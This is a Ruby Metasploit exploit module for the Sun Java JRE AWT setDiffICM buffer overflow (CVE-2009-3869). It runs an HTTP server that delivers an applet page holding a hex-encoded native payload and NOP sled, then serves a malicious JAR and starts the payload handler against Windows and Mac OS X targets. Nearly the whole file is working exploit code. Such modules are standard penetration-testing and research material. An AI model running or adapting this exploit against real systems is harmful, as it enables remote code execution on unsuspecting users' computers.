##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
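# Browser exploit module for the Sun JRE AWT setDiffICM overflow (CVE-2009-3869).
#
# Delivery is a two-step HTTP flow served by the built-in HTTP server mixin:
#   1. any non-.jar request gets a small HTML page with an <applet> tag whose
#      PARAMs carry the hex-encoded native payload and a NOP sled;
#   2. any request for a *.jar path is answered with the pre-built JAR read from
#      the framework data directory in #exploit.
# A per-client hash (@targetcache, keyed by peer IP) records the last request
# time and, for the (currently disabled) Automatic target, the User-Agent-derived
# target; entries idle for more than 60 seconds are dropped on each request.
class MetasploitModule < Msf::Exploit::Remote
  Rank = GreatRanking

  #
  # This module acts as an HTTP server
  #
  include Msf::Exploit::Remote::HttpServer::HTML

  # Registers module metadata (name, references, payload constraints, targets).
  #
  # @param info [Hash] metadata passed in by the framework and merged via update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Sun Java JRE AWT setDiffICM Buffer Overflow',
        'Description' => %q{
          This module exploits a flaw in the setDiffICM function in the Sun JVM.

          The payload is serialized and passed to the applet via PARAM tags. It must be
          a native payload.

          The effected Java versions are JDK and JRE 6 Update 16 and earlier,
          JDK and JRE 5.0 Update 21 and earlier, SDK and JRE 1.4.2_23 and
          earlier, and SDK and JRE 1.3.1_26 and earlier.

          NOTE: Although all of the above versions are reportedly vulnerable, only
          1.6.0_u11 and 1.6.0_u16 on Windows XP SP3 were tested.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'jduck'
        ],
        'References' => [
          [ 'CVE', '2009-3869' ],
          [ 'OSVDB', '59710' ],
          [ 'BID', '36881' ],
          [ 'ZDI', '09-078' ]
        ],
        'Payload' => {
          'Space' => 1024,
          'BadChars' => '',
          'DisableNops' => true,
        },
        'Platform' => %w{win osx},
        'Targets' => [
          # No automatic targetting for now ...
          #
          # [ 'J2SE 1.6_16 Automatic',
          #   {
          #     'Platform' => %w{ linux osx win },
          #     'Arch' => [ARCH_X86, ARCH_PPC]
          #   }
          # ],
          [
            'J2SE 1.6_16 on Windows x86',
            {
              'Platform' => 'win',
              'Arch' => ARCH_X86
            }
          ],
          [
            'J2SE 1.6_16 on Mac OS X PPC',
            {
              'Platform' => 'osx',
              'Arch' => ARCH_PPC,
            }
          ],
          [
            'J2SE 1.6_16 on Mac OS X x86',
            {
              'Platform' => 'osx',
              'Arch' => ARCH_X86,
            }
          ],
        ],
        'DefaultTarget' => 0,
        'DisclosureDate' => '2009-11-04',
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )
  end

  # Handles one HTTP request from a connecting browser.
  #
  # Refreshes the per-IP target cache, expires stale entries, then either
  # redirects to a trailing-slash URL, serves the applet-loader HTML, or
  # serves the JAR and starts the payload handler.
  #
  # @param cli [Rex::Socket] the client connection
  # @param req [Rex::Proto::Http::Request] the parsed request
  def on_request_uri(cli, req)
    # One timestamp per request: the entry we refresh below can never be
    # considered stale by the cleanup in the same pass.
    now = Time.now.to_i

    # Create a cached mapping between IP and detected target
    @targetcache ||= {}
    @targetcache[cli.peerhost] ||= {}
    @targetcache[cli.peerhost][:update] = now

    # Only reached when the Automatic target is enabled (it is commented out above).
    if target.name =~ /Automatic/
      case req.headers['User-Agent']
      when /Windows/i
        print_status("Choosing a Windows target")
        @targetcache[cli.peerhost][:target] = self.targets[1]
      when /PPC Mac OS X/i
        print_status("Choosing a Mac OS X PPC target")
        @targetcache[cli.peerhost][:target] = self.targets[2]
      when /Intel Mac OS X/i
        print_status("Choosing a Mac OS X x86 target")
        @targetcache[cli.peerhost][:target] = self.targets[3]
      else
        print_status("Unknown target for: #{req.headers['User-Agent']}")
      end
    end

    # Clean the cache: drop every client not seen within the last 60 seconds.
    # Hash#delete_if mutates safely, so no intermediate removal list is needed.
    @targetcache.delete_if { |_addr, entry| now > entry[:update] + 60 }

    # Request processing. \z anchors at the true end of the string so a
    # multi-line value cannot satisfy the suffix test the way $ would allow.
    unless req.uri =~ /\.jar\z/i
      # Redirect to the base directory so the applet code loads...
      unless req.uri =~ %r{/\z}
        print_status("Sending redirect so path ends with / ...")
        send_redirect(cli, get_resource() + '/', '')
        return
      end

      # Display the applet loading HTML
      print_status("Sending HTML")
      send_response_html(cli, generate_html(payload.encoded), {
        'Content-Type' => 'text/html',
        'Pragma' => 'no-cache'
      })
      return
    end

    # Send the actual applet over. Note that any *.jar path is answered with the
    # same pre-loaded JAR; the random name in the HTML is not checked here.
    print_status("Sending applet")
    send_response(cli, generate_applet(cli, req), {
      'Content-Type' => 'application/octet-stream',
      'Pragma' => 'no-cache'
    })

    # Handle the payload
    handler(cli)
  end

  # Builds the applet-loader page.
  #
  # @param pl [String] the encoded native payload bytes
  # @return [String] HTML with the JAR name, hex-encoded (4-byte padded) payload
  #   and a 4-byte NOP sled substituted into the template
  def generate_html(pl)
    html = <<~EOF
      <html>
      <head>
      <!-- <meta http-equiv=refresh content=10 /> -->
      </head>
      <body>
      <applet width='100%' height='100%' code='AppletX' archive='JARNAME'>
      <param name='sc' value='SCODE' />
      <param name='np' value='NOPS' />
      </applet>
      </body>
      </html>
    EOF

    # finalize html
    jar_name = rand_text_alphanumeric(32) + ".jar"
    html.gsub!(/JARNAME/, jar_name)

    # put payload into html
    debug_payload = false
    pload = ""
    pload << "\xcc" if debug_payload
    pload << pl

    # Pad with random bytes so the payload length is a multiple of 4.
    pad = (-pload.length) % 4
    pload << rand_text(pad) if pad > 0

    if debug_payload
      print_status("pload #{pload.length} bytes:\n" + Rex::Text.to_hex_dump(pload))
    end
    html.gsub!(/SCODE/, Rex::Text.to_hex(pload, ''))

    # put nops into html
    nops = "\x90\x90\x90\x90"
    html.gsub!(/NOPS/, Rex::Text.to_hex(nops, ''))
    # print_status("nops #{nops.length} bytes:\n" + Rex::Text.to_hex_dump(nops))

    html
  end

  # Loads the pre-built JAR from the framework data directory, then starts
  # the HTTP server via super.
  #
  # @raise [Errno::ENOENT] if the JAR is missing from the data directory
  def exploit
    path = File.join(Msf::Config.data_directory, "exploits", "CVE-2009-3869.jar")
    # File.binread opens, reads the whole file in binary mode and closes it in
    # one step, so the descriptor is released even if the read raises.
    @jar_data = File.binread(path)

    super
  end

  # Returns the JAR bytes to serve for this client.
  #
  # With the Automatic target a client whose User-Agent was never matched (no
  # cached :target) receives an empty body instead of the JAR.
  #
  # @param cli [Rex::Socket] the client connection
  # @param req [Rex::Proto::Http::Request] the request (unused; kept for callers)
  # @return [String] the JAR data, or '' when no target was selected
  def generate_applet(cli, req)
    # dig tolerates a missing per-client entry instead of raising on nil.
    if target.name =~ /Automatic/ && !@targetcache&.dig(cli.peerhost, :target)
      return ''
    end

    @jar_data
  end
end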